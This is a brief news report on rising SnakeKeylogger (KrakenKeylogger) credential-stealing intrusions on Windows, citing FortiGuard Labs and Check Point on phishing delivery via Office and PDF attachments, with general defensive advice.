Intrusions seeking to exfiltrate credentials and screenshots in Windows systems with the SnakeKeylogger malware, also known as KrakenKeylogger, have been escalating, reports The Register.
Zero-day detection hits for SnakeKeylogger reached hundreds, with the trojan attempting communications with numerous outside servers, according to an alert from Fortinet's FortiGuard Labs. While no information was provided regarding the attack vector leveraged to facilitate SnakeKeylogger compromise, the malware has been distributed via phishing campaigns, with a separate Check Point advisory noting the concealment of the payload's code within malicious Office document or PDF attachments. "The malware embedded in the document is typically a downloader. It uses PowerShell scripts to download a copy of Snake Keylogger to the infected system and execute it," said Check Point. Organizations have been urged to be more vigilant of emails and their accompanying links and attachments, as well as ensure the adoption of updated security systems, including antivirus and endpoint security tools.